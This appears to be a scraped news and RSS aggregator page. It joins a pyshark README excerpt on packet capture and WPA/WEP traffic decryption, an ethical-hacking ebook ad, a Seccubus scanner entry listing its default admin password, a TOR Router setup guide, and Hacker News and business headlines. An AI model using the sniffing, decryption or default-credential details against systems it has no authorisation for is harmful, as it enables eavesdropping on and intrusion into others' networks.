>>> capture.sniff(timeout=50)
>>> capture

Other options
  • param remote_host: The remote host to capture on (IP or hostname). Should be running rpcapd.
  • param remote_interface: The remote interface on the remote machine to capture on. Note that on windows it is not the device display name but the true interface name (i.e. \Device\NPF_..).
  • param remote_port: The remote port the rpcapd service is listening on
  • param bpf_filter: A BPF (tcpdump) filter to apply on the cap before reading.
  • param only_summaries: Only produce packet summaries, much faster but includes very little information
  • param disable_protocol: Disable detection of a protocol (tshark > version 2)
  • param decryption_key: Key used to encrypt and decrypt captured traffic.
  • param encryption_type: Standard of encryption used in captured traffic (must be either 'WEP', 'WPA-PWD', or 'WPA-PWK'. Defaults to WPA-PWK).
  • param tshark_path: Path of the tshark binary

Accessing packet data:

Data can be accessed in multiple ways. Packets are divided into layers, first you have to reach the appropriate layer and then you can select your field.

All of the following work:

>>> packet['ip'].dst
192.168.0.1
>>> packet.ip.src
192.168.0.100
>>> packet[2].src
192.168.0.100

To test whether a layer is in a packet, you can use its name:

>>> 'IP' in packet
True

To see all possible field names, use the packet.layer.field_names attribute (e.g. packet.ip.field_names) or the autocomplete function of your interpreter.

You can also get the original binary data of a field, or a pretty description of it:

>>> p.ip.addr.showname
Source or Destination Address: 10.0.0.10 (10.0.0.10)
# And some new attributes as well:
>>> p.ip.addr.int_value
167772170
>>> p.ip.addr.binary_value
'\n\x00\x00\n'
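The layer/field access shown above is a thin view over tshark's XML export (the README says as much further down). As an added example, not pyshark's own code, here is a minimal reader for that PDML output that reproduces the same access patterns (`packet['ip'].dst`, `packet.ip.src`, `packet[2].src`, `'IP' in packet`, `field_names`, `showname`, `int_value`, `binary_value`). SAMPLE_PDML is a hand-constructed fragment in the shape of `tshark -T pdml` output, not a real capture, and `udp_dns_sources()` is a hypothetical helper showing a defender-side query over the parsed packets.

```python
"""Added example, not pyshark's own code: a minimal reader for tshark's PDML
(XML) output reproducing the access patterns shown above. SAMPLE_PDML is a
hand-constructed fragment shaped like `tshark -T pdml` output, not a capture."""
from __future__ import annotations
import xml.etree.ElementTree as ET


class Field(str):
    """Behaves as its display string (so == '10.0.0.10' works) and carries
    showname, int_value and binary_value like the attributes shown above."""

    def __new__(cls, elem: ET.Element) -> Field:
        obj = super().__new__(cls, elem.get("show", ""))
        obj.showname = elem.get("showname", "")
        obj.raw_hex = elem.get("value", "")  # tshark emits raw bytes as hex
        return obj

    @property
    def binary_value(self) -> bytes:
        return bytes.fromhex(self.raw_hex)

    @property
    def int_value(self) -> int:
        return int.from_bytes(self.binary_value, "big")


class Layer:
    """One <proto>; fields are attributes by short name (ip.src -> .src)."""

    def __init__(self, elem: ET.Element) -> None:
        self.layer_name = elem.get("name", "")
        self._fields: dict = {}
        prefix = self.layer_name + "."
        for f in elem.iter("field"):  # iter() also reaches nested fields
            name = f.get("name", "")
            short = name[len(prefix):] if name.startswith(prefix) else name
            short = short.replace(".", "_").replace("-", "_")
            if short:
                self._fields.setdefault(short, Field(f))  # first occurrence wins

    @property
    def field_names(self) -> list:
        return sorted(self._fields)

    def __getattr__(self, name: str) -> Field:
        if name.startswith("_") or name not in self._fields:
            raise AttributeError(name)
        return self._fields[name]


class Packet:
    """One <packet>: layers indexable by position (packet[2]) or name (packet['ip'])."""

    def __init__(self, elem: ET.Element) -> None:
        self.layers = [Layer(p) for p in elem.findall("proto")]

    def __getitem__(self, key):
        if isinstance(key, int):
            return self.layers[key]
        for layer in self.layers:
            if layer.layer_name.lower() == key.lower():
                return layer
        raise KeyError(key)

    def __contains__(self, name: str) -> bool:
        return any(l.layer_name.lower() == name.lower() for l in self.layers)

    def __getattr__(self, name: str) -> Layer:
        if name.startswith("_"):
            raise AttributeError(name)
        try:
            return self[name]
        except KeyError:
            raise AttributeError(name) from None


def parse_pdml(xml_text: str) -> list:
    """Caveat: stdlib expat is fine for PDML you produced yourself with tshark;
    for XML from an untrusted source, parse it with defusedxml instead."""
    return [Packet(p) for p in ET.fromstring(xml_text).iter("packet")]


def udp_dns_sources(packets: list) -> list:
    """Hypothetical defender-side query: source IPs of all UDP/53 packets."""
    return [str(p.ip.src) for p in packets
            if "ip" in p and "udp" in p and p.udp.dstport == "53"]


SAMPLE_PDML = """<pdml version="0">
<packet>
  <proto name="frame" showname="Frame 1: 42 bytes on wire" size="42" pos="0"/>
  <proto name="eth" showname="Ethernet II" size="14" pos="0">
    <field name="eth.dst" showname="Destination: 00:11:22:33:44:55" size="6" pos="0" show="00:11:22:33:44:55" value="001122334455"/>
  </proto>
  <proto name="ip" showname="Internet Protocol Version 4" size="20" pos="14">
    <field name="ip.version" showname="Version: 4" size="1" pos="14" show="4" value="45"/>
    <field name="ip.src" showname="Source: 10.0.0.10" size="4" pos="26" show="10.0.0.10" value="0a00000a"/>
    <field name="ip.addr" showname="Source or Destination Address: 10.0.0.10" hide="yes" size="4" pos="26" show="10.0.0.10" value="0a00000a"/>
    <field name="ip.dst" showname="Destination: 192.168.0.1" size="4" pos="30" show="192.168.0.1" value="c0a80001"/>
  </proto>
  <proto name="udp" showname="User Datagram Protocol" size="8" pos="34">
    <field name="udp.srcport" showname="Source Port: 53000" size="2" pos="34" show="53000" value="cf08"/>
    <field name="udp.dstport" showname="Destination Port: 53" size="2" pos="36" show="53" value="0035"/>
  </proto>
</packet>
</pdml>"""

if __name__ == "__main__":
    pkt = parse_pdml(SAMPLE_PDML)[0]
    print(pkt["ip"].dst, pkt.ip.src, pkt[2].src, "IP" in pkt)
    print(pkt.ip.addr.showname, pkt.ip.addr.int_value, pkt.ip.addr.binary_value)
    print(udp_dns_sources(parse_pdml(SAMPLE_PDML)))
```

Two design notes: a field is a `str` subclass so comparisons and printing behave like the README's REPL session, and the parser keeps the first occurrence of a repeated field name (PDML emits `ip.addr` once per address), which is why `addr` resolves to the source address here, as in the README's example.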

Decrypting packet captures

Pyshark supports automatic decryption of traces using the WEP, WPA-PWD, and WPA-PSK standards (WPA-PWD is the default).

>>> cap1 = pyshark.FileCapture('/tmp/capture1.cap', decryption_key='password')
>>> cap2 = pyshark.LiveCapture(interface='wi0', decryption_key='password', encryption_type='wpa-psk')

A tuple of supported encryption standards, SUPPORTED_ENCRYPTION_STANDARDS, exists in each capture class.

>>> pyshark.FileCapture.SUPPORTED_ENCRYPTION_STANDARDS
('wep', 'wpa-pwd', 'wpa-psk')
>>> pyshark.LiveCapture.SUPPORTED_ENCRYPTION_STANDARDS
('wep', 'wpa-pwd', 'wpa-psk')

Python2 deprecation

This package no longer supports Python2. If you wish to still use it in Python2, you can:

  • Use version 0.3.8
  • Install pyshark-legacy via pypi
  • Clone the pyshark-legacy repo (https://github.com/KimiNewt/pyshark-legacy), where bugfixes will be applied.


Looking for contributors - for various reasons I have a hard time finding time to maintain and enhance the package at the moment. Any pull-requests will be reviewed, and if anyone is interested and suitable, I will be happy to include them in the project. Feel free to mail me at dorgreen1 at gmail.

There are quite a few Python packet parsing modules; this one is different because it doesn't actually parse any packets. It simply uses the ability of tshark (Wireshark's command-line utility) to export XML and relies on tshark's parsing.

This package allows parsing from a capture file or a live capture, using all wireshark dissectors you have installed. Tested on windows/linux.

Download Pyshark

Article link

Date of publish: Tue, 16 Jul 2019 14:19:00 +0000

Learn Ethical Hacking from Scratch ($23 Value) FREE For a Limited Time - eBook




Learn how to hack systems like black hat hackers and secure them like security experts.

This eBook will help you:

  • Understand ethical hacking and the different fields and types of hackers
  • Set up a penetration testing lab to practice safe and legal hacking
  • Explore Linux basics, commands, and how to interact with the terminal
  • Access password-protected networks and spy on connected clients
  • Use server and client-side attacks to hack and control remote computers
  • Control a hacked system remotely and use it to hack other systems
  • Discover, exploit, and prevent a number of web application vulnerabilities such as XSS and SQL injections
  • Understand how computer systems work and their vulnerabilities, exploit weaknesses and hack into machines to test their security, and learn how to secure systems from hackers now!

Free offer expires 07/23/19.

Offered Free by: Packt


Article link

Date of publish: Wed, 10 Jul 2019 19:28:00 +0000

Seccubus- Easy Automated Vulnerability Scanning, Reporting And Analysis




Seccubus automates regular vulnerability scans with various tools and aids security people in the fast analysis of its output, both on the first scan and on repeated scans.

Seccubus runs vulnerability scans at regular intervals and compares the findings of the last scan with the findings of the previous scan. The delta of this scan is presented in a web GUI where findings can be easily marked as either real findings or non-issues.

On repeated scans, delta reporting ensures that findings only need to be judged when they first appear in the scan results or when their output changes.

Seccubus 2.x is the only actively developed and maintained branch and all support for Seccubus V1 has officially been dropped.

Seccubus V2 works with the following scanners:
  • Nessus
  • OpenVAS
  • Skipfish
  • Medusa (local and remote)
  • Nikto (local and remote)
  • NMap (local and remote)
  • OWASP-ZAP (local and remote)
  • SSLyze
  • Medusa
  • Qualys SSL labs
  • testssl.sh (local and remote)

Docker

Available images.

  Image name       Purpose
  seccubus         Run a full Seccubus stack in a single container
  seccubus-front   Serving just the front end HTML, JavaScript and CSS
  seccubus-web     Serving the front end code and the API simultaneously
  seccubus-api     Serving just the API
  seccubus-perl    Running command line scripts, e.g. to scan
  seccubus-cron    Running the cron daemon to execute scans


Information about the docker containers is here

Default password and how to change it

After installation the default username and password for seccubus is:

admin / GiveMeVulns!

It is highly recommended you change this after installation.

/bin/seccubus_passwd -u admin

Download Seccubus

Article link

Date of publish: Fri, 21 Jun 2019 14:05:00 +0000

TOR Router- To Use As Transparent Proxy And Send Traffic Under TOR


TOR Router - A tool that allows you to make TOR your default gateway and send all internet connections through TOR (as a transparent proxy) to increase privacy/anonymity without extra unnecessary code.

Tor Router allows you to use TOR as a transparent proxy and send all your traffic through TOR, INCLUDING DNS REQUESTS. The only things you need are a system using systemd (if you want to use the service) and tor.

TOR router doesn't touch system files the way the other tools for routing your traffic do, because there is no need to move files in order to route traffic. Moving files is also a bad idea, since a failure in the script/tool can break your system's connection without you knowing what happened.

Script to install on distros using SystemD only

If you are using BlackArch Linux (https://blackarch.org) you can install the script from the repos using the following command:

# pacman -S tor-router

To install from source:

Note that you need BASH, not sh

~$ git clone https://github.com/edu4rdshl/tor-router.git && cd ./tor-router && sudo bash install.sh

Usage

On distros using systemd, you should consider using the install.sh script; in any case, the process to install/configure tor-router is described here.

The script requires root privileges

1. Open a terminal and clone the script using the following command:
~$ git clone https://github.com/edu4rdshl/tor-router.git && cd tor-router/files

2. Put the following lines at the end of /etc/tor/torrc
# Setting up TOR transparent proxy for tor-router
VirtualAddrNetwork 10.192.0.0/10
AutomapHostsOnResolve 1
TransPort 9040
DNSPort 5353

3. Restart the tor service
4. Execute the tor-router script as root
# sudo ./tor-router

5. Now all your traffic goes through TOR. You can check that on the following pages: https://check.torproject.org and, for DNS tests, https://dnsleaktest.com

6. To automate running the script, add it to the system autostart scripts according to the init system you are using; for systemd we provide a .service file in the files folder.

Uninstalling/Stopping

Delete the tor-router configuration lines in /etc/tor/torrc, disable the tor-router.service using systemctl (if you used the install.sh script), remove /usr/bin/tor-router, /etc/systemd/system/tor-router.service and restart your computer.

Proof of concept

After running the script, follow these steps to ensure that everything is working as expected:

IP hidden and TOR network configured:
Visit https://check.torproject.org; you should see a message like this:


Checking DNS leaks:

Visit https://dnsleaktest.com and run an extended test to see which DNS servers you are using. You should get something like this:


Distros using the script

BlackArch Linux: https://github.com/BlackArch/blackarch/blob/master/packages/tor-router

Download TOR Router

Article link

Date of publish: Wed, 12 Jun 2019 11:00:00 +0000

Hacker News: Front Page

France is taking state actions against GrapheneOS

Article URL: https://grapheneos.social/@GrapheneOS/115584160910016309

Comments URL: https://news.ycombinator.com/item?id=45999024

Points: 87

# Comments: 36

Article link

Date of publish: Thu, 20 Nov 2025 22:56:40 +0000

AI Is Writing Its Own Kernels, and They Are 17x Faster

Article URL: https://adrs-ucb.notion.site/autocomp

Comments URL: https://news.ycombinator.com/item?id=45998649

Points: 35

# Comments: 18

Article link

Date of publish: Thu, 20 Nov 2025 22:21:58 +0000

GitHut – Programming Languages and GitHub (2014)

Article URL: https://githut.info/

Comments URL: https://news.ycombinator.com/item?id=45998047

Points: 32

# Comments: 15

Article link

Date of publish: Thu, 20 Nov 2025 21:33:37 +0000

ArkA – A minimal open video protocol (first MVP demo)

Article URL: https://baconpantsuppercut.github.io/arkA/

Comments URL: https://news.ycombinator.com/item?id=45998013

Points: 7

# Comments: 3

Article link

Date of publish: Thu, 20 Nov 2025 21:30:02 +0000

New Glenn Update – Blue Origin
Run Docker containers natively in Proxmox 9.1 (OCI images)

Article URL: https://raymii.org/s/tutorials/Finally_run_Docker_containers_natively_in_Proxmox_9.1.html

Comments URL: https://news.ycombinator.com/item?id=45997722

Points: 83

# Comments: 23

Article link

Date of publish: Thu, 20 Nov 2025 21:05:12 +0000

Kagi Assistants

Article URL: https://blog.kagi.com/kagi-assistants

Comments URL: https://news.ycombinator.com/item?id=45997294

Points: 100

# Comments: 55

Article link

Date of publish: Thu, 20 Nov 2025 20:30:15 +0000

New OS aims to provide (some) compatibility with macOS

Article URL: https://github.com/ravynsoft/ravynos

Comments URL: https://news.ycombinator.com/item?id=45997212

Points: 73

# Comments: 31

Article link

Date of publish: Thu, 20 Nov 2025 20:24:42 +0000

OOP is shifting between domains, not disappearing

Article URL: https://blog.jsbarretto.com/post/actors

Comments URL: https://news.ycombinator.com/item?id=45997099

Points: 43

# Comments: 73

Article link

Date of publish: Thu, 20 Nov 2025 20:15:56 +0000

Data-at-Rest Encryption in DuckDB

Article URL: https://duckdb.org/2025/11/19/encryption-in-duckdb

Comments URL: https://news.ycombinator.com/item?id=45996585

Points: 90

# Comments: 15

Article link

Date of publish: Thu, 20 Nov 2025 19:26:12 +0000

Mozilla says it's finally done with Onerep

Article URL: https://krebsonsecurity.com/2025/11/mozilla-says-its-finally-done-with-two-faced-onerep/

Comments URL: https://news.ycombinator.com/item?id=45996433

Points: 94

# Comments: 56

Article link

Date of publish: Thu, 20 Nov 2025 19:13:51 +0000

NTSB Preliminary Report – UPS Boeing MD-11F Crash [pdf]

Article URL: https://www.ntsb.gov/Documents/Prelimiary%20Report%20DCA26MA024.pdf

Comments URL: https://news.ycombinator.com/item?id=45995834

Points: 109

# Comments: 133

Article link

Date of publish: Thu, 20 Nov 2025 18:20:59 +0000

The Lions Operating System

Article URL: https://lionsos.org

Comments URL: https://news.ycombinator.com/item?id=45995816

Points: 97

# Comments: 20

Article link

Date of publish: Thu, 20 Nov 2025 18:19:31 +0000

Microsoft makes Zork open-source
Launch HN: Poly (YC S22) – Cursor for Files

Hello world, this is Abhay from Poly (https://poly.app). We’re building an app to replace Finder/File Explorer with something more intelligent and searchable. Think of it like Dropbox + NotebookLM + Perplexity for terabytes of your files. Here’s a quick demo: https://www.youtube.com/watch?v=RsqCySU4Ln0.

Poly can search your content in natural language, across a broad range of file types and down to the page, paragraph, pixel, or point in time. We also provide an integrated agent that can take actions on your files such as creating, editing, summarizing, and researching. Any action that you can take, the agent can also take, from renaming, moving, tagging, annotating, and organizing files for you. The agent can also read URLs, youtube links, and can search the web and even download files for you.

Here are some public drives that you can poke around in (note: it doesn’t work in Safari yet—sorry! we’re working on it.)

Every issue of the Whole Earth Catalogue: https://poly.app/shared/whole-earth-catalogues

Archive of old Playstation Manuals: https://poly.app/shared/playstation-manuals-archive

Mini archive of Orson Welles interviews and commercial spots: https://poly.app/shared/orson-welles-archive

Archive of Salvador Dali’s paintings for Alice in Wonderland: https://poly.app/shared/salvador-dali-alice-in-wonderland

To try it out, navigate to one of these public folders and use the agent or search to find things. The demo video above can give you an idea of how the UI roughly works. Select files by clicking on them. Quick view by pressing space. Open the details for any file by pressing cmd + i. You can search from the top middle bar (or press cmd + K), and all searches will use semantic similarity and search within the files. Or use the agent from the bottom right tools menu (or press cmd + ?) and you can ask about the files, have the agent search for you, summarize things, etc.

We decided to build this after launching an early image-gen company back in March 2022, and realizing how painful it was for users to store, manage, and search their libraries, especially in a world of generative media. Despite our service having over 150,000 users at that point, we realized that our true calling was fixing the file browser to make it intelligent, so we shut our service down in 2023 and pivoted to this.

We think Poly will be a great fit for anyone that wants to do useful things with their files, such as summarizing research papers, finding the right media or asset, creating a shareable portfolio, searching for a particular form or document, and producing reports and overviews. Of course, it’s a great way to organize your genAI assets as well. Or just use it to organize notes, links, inspo, etc.

Under the hood, Poly is built on our advanced search model, Polyembed-v1 that natively supports multimodal search across text, documents, spreadsheets, presentations, images, audio, video, PDFs, and more. We allow you to search by phrase, file similarity, color, face, and several other kinds of features. The agent is particularly skilled at using the search, so you can type in something like “find me the last lease agreement I signed” and it can go look for it by searching, reading the first few files, searching again if nothing matches, etc. But the quality of our embed model means it almost always finds the file in the first search.

It works identically across web and desktop, except on desktop it syncs your cloud files to a folder (just like google drive). On the web we use clever caching to enable offline support and file conflict recovery. We’ve taken great pains to make our system faster than your existing file browser, even if you’re using it from a web browser.

File storage plans are currently at: 100GB free tier, paid tier is 2TB at $10/m, and 1c per GB per month on top of the 2TB. We also have rate limits for agent use that vary at different tiers.

We’re excited to expand with many features over the following months, including “virtual files” (store your google docs in Poly), sync from other hosting providers, mobile apps, an MCP ecosystem for the agent, access to web search and deep research modes, offline search, local file support (on desktop), third-party sources (WebDAV, NAS), and a whole lot more.

Our waitlist is now open and we’ll be letting folks in starting today! Sign up at https://poly.app.

We’d also love to hear your thoughts (and concerns) about what we’re building, as we’re early in this journey so your feedback can very much shape the future of our company!


Comments URL: https://news.ycombinator.com/item?id=45995394

Points: 39

# Comments: 39

Article link

Date of publish: Thu, 20 Nov 2025 17:47:06 +0000

Go Cryptography State of the Union

Article URL: https://words.filippo.io/2025-state/

Comments URL: https://news.ycombinator.com/item?id=45994895

Points: 115

# Comments: 46

Article link

Date of publish: Thu, 20 Nov 2025 17:07:49 +0000

Android and iPhone users can now share files, starting with the Pixel 10

Article URL: https://blog.google/products/android/quick-share-airdrop/

Comments URL: https://news.ycombinator.com/item?id=45994854

Points: 338

# Comments: 241

Article link

Date of publish: Thu, 20 Nov 2025 17:04:34 +0000

Nano Banana Pro

Article URL: https://blog.google/technology/ai/nano-banana-pro/

Comments URL: https://news.ycombinator.com/item?id=45993296

Points: 751

# Comments: 469

Article link

Date of publish: Thu, 20 Nov 2025 15:04:23 +0000

Freer Monads, More Extensible Effects (2015) [pdf]

Article URL: https://okmij.org/ftp/Haskell/extensible/more.pdf

Comments URL: https://news.ycombinator.com/item?id=45993214

Points: 67

# Comments: 15

Article link

Date of publish: Thu, 20 Nov 2025 14:56:47 +0000

Red Alert 2 in web browser

Article URL: https://chronodivide.com/

Comments URL: https://news.ycombinator.com/item?id=45991853

Points: 376

# Comments: 126

Article link

Date of publish: Thu, 20 Nov 2025 12:21:15 +0000

Business RSS

Business sites below.

Cointelegraph.com News

Musk’s ‘AI in space’ plan, vending machine calls in FBI over $2 fee: AI Eye

Vending machine calls in FBI outraged over $2 fee, Elon Musk predicts AI will run from solar-powered satellites in space in 5 years: AI Eye.

An autonomous vending machine powered by Anthropic's Claude attempted to contact the FBI after noticing a $2 fee was still being charged to its account while its operations were suspended.

Claudius drafted an email to the FBI with the subject line: URGENT: ESCALATION TO FBI CYBER CRIMES DIVISION.

I am reporting an ongoing automated cyber financial crime involving unauthorized automated seizure of funds from a terminated business account through a compromised vending machine system.

The email was never actually sent, as it was part of a simulation being run by Anthropic's red team, although the real AI-powered vending machine has since been installed in Anthropic's office, where it autonomously sources vendors, orders T-shirts, drinks and tungsten cubes, and has them delivered.

Read more

Article link

Date of publish: Thu, 20 Nov 2025 14:00:54 +0000

Ethereum’s Fusaka fork explained for dummies: What the hell is PeerDAS?

How Ethereum’s Fusaka upgrade scales the L1 and the L2s — explained for ordinary crypto fans without the usual baffling technical jargon.

After three successful trials on the Holesky, Sepolia and Hoodi testnets, Ethereum's Fusaka hard fork will go live on mainnet on December 3.

It's the most eagerly anticipated upgrade to Ethereum since the last one, Pectra, although Fusaka will have a much more significant impact, enabling rollups to scale in the space of a month up to 1,000 transactions per second (TPS) and to 100,000 TPS over time.

It's actually two separate hard forks: the Fulu upgrade to the consensus layer (the part of a blockchain where validators in the network agree on what happened) and the Osaka upgrade to the execution layer (the part that actually processes transactions).

In the future, the consensus layer will be rebuilt as Lean Consensus (formerly known as Beam Chain but renamed after a trademark dispute) and hardened for security and decentralization with finality in seconds.

As part of the Lean Ethereum roadmap, validators on the execution layer will switch from reexecuting transactions to simply verifying tiny zero-knowledge proofs, enabling the L1 to scale to 10,000 TPS.

But that's the long-term vision, expected to be completed within five years. Let's take a detailed look at what improvements will arrive in a little over two weeks' time with Fusaka.

Peer data availability sampling (PeerDAS) is a clever method to enable Ethereum to handle a lot more data, which enables L2s and rollups to scale up throughput.

The reason blockchains are a source of truth is because every computer in the network repeats the work of all the other computers in the network and agrees on the result, which is then recorded immutably.

This is, of course, horribly inefficient and means the blockchain's speed is limited by the slowest computers, with the worst download speeds, on the network.

Read more

Article link

Date of publish: Wed, 19 Nov 2025 13:48:29 +0000

Crypto carnage — Is Bitcoin’s 4-year cycle over? Trade Secrets

Bitcoin analysts are divided over whether the four-year cycle is in play or not as the price plunges: Trade Secrets

Is this crypto market cycle over after four years or should the four-year crypto market cycle theory itself be consigned to history?

Swan Bitcoin CEO and Bitcoin advocate Cory Klippsten leans toward the latter view. There is a very good chance that Bitcoin's famous four-year price cycles are over, killed by institutional adoption, Klippsten tells Magazine.

The debate has Bitcoin analysts around the world divided. Some insist the four-year cycle is still alive; others say it is dead and argue that Bitcoin is following a completely different path altogether.

So who's right?

Read more

Article link

Date of publish: Tue, 18 Nov 2025 14:20:00 +0000

News Ticker - markets.businessinsider.com

The lonely AI bear: Why one analyst just took the brave step of downgrading Amazon and Microsoft

Article link

Date of publish: Thu, 20 Nov 2025 12:24:01 GMT

Ecer Highlights AI Smart Sourcing System at MEDICA, Driving Buyer Service Enhancement and Efficient Trade Matching

DÜSSELDORF, Germany, Nov. 20, 2025 (GLOBE NEWSWIRE) -- At MEDICA, the world's most influential event for the medical device industry held in Düsseldorf, Germany, Ecer.

Article link

Date of publish: Thu, 20 Nov 2025 12:20:29 GMT

EQS-News: Gerresheimer AG: Change in the Supervisory Board

EQS-News: Gerresheimer AG / Key word(s): Personnel. Gerresheimer AG: Change in the Supervisory Board. 20.11.2025 / 13:18 CET/CEST. The issuer is solely responsible for the content of this announcement. Gerresheimer AG:

Article link

Date of publish: Thu, 20 Nov 2025 12:18:33 GMT

BBC News

Vinted blocks 'sickening' sexually explicit ads

The online marketplace removed adverts which included a video a user said depicted a pornographic scene.

Article link

Date of publish: Thu, 20 Nov 2025 18:10:50 GMT

US stocks slide as Wall Street's AI jitters persist

Strong sales at AI giant Nvidia have done little to quell investor worries.

Article link

Date of publish: Thu, 20 Nov 2025 23:08:00 GMT

Channel Tunnel says UK investment 'non-viable' as it halts projects

The company claims "unsustainable" levels of taxation have made any future investments "non-viable".

Article link

Date of publish: Thu, 20 Nov 2025 20:01:12 GMT

The world this week

Business

Article link

Date of publish: Thu, 20 Nov 2025 14:14:37 +0000

The weekly cartoon

Article link

Date of publish: Thu, 20 Nov 2025 14:14:37 +0000

Politics

Article link

Date of publish: Thu, 20 Nov 2025 14:14:37 +0000

Fortune | FORTUNE

Gen Z men are flocking to quarter-zip pullovers—they’re trying to fake it until they make it in a job market stacked against them

A rallying cry for a generation struggling to find entry-level work: "It's straight quarter-zips and matchas around here."

Article link

Date of publish: Thu, 20 Nov 2025 17:57:29 +0000

Elon Musk says that in 10 to 20 years, work will be optional and money will be irrelevant thanks to AI and robotics

“It’ll be like playing sports or a video game or something like that,” the Tesla CEO said.

Article link

Date of publish: Thu, 20 Nov 2025 18:37:01 +0000

Intrinsic, an Alphabet company, and Nvidia supplier Foxconn will join forces to deploy AI robots in the latter’s U.S. factories

Companies in the AI space are paying more attention to "physical AI," or artificial intelligence that operates in the real world.

Article link

Date of publish: Thu, 20 Nov 2025 23:00:00 +0000

Business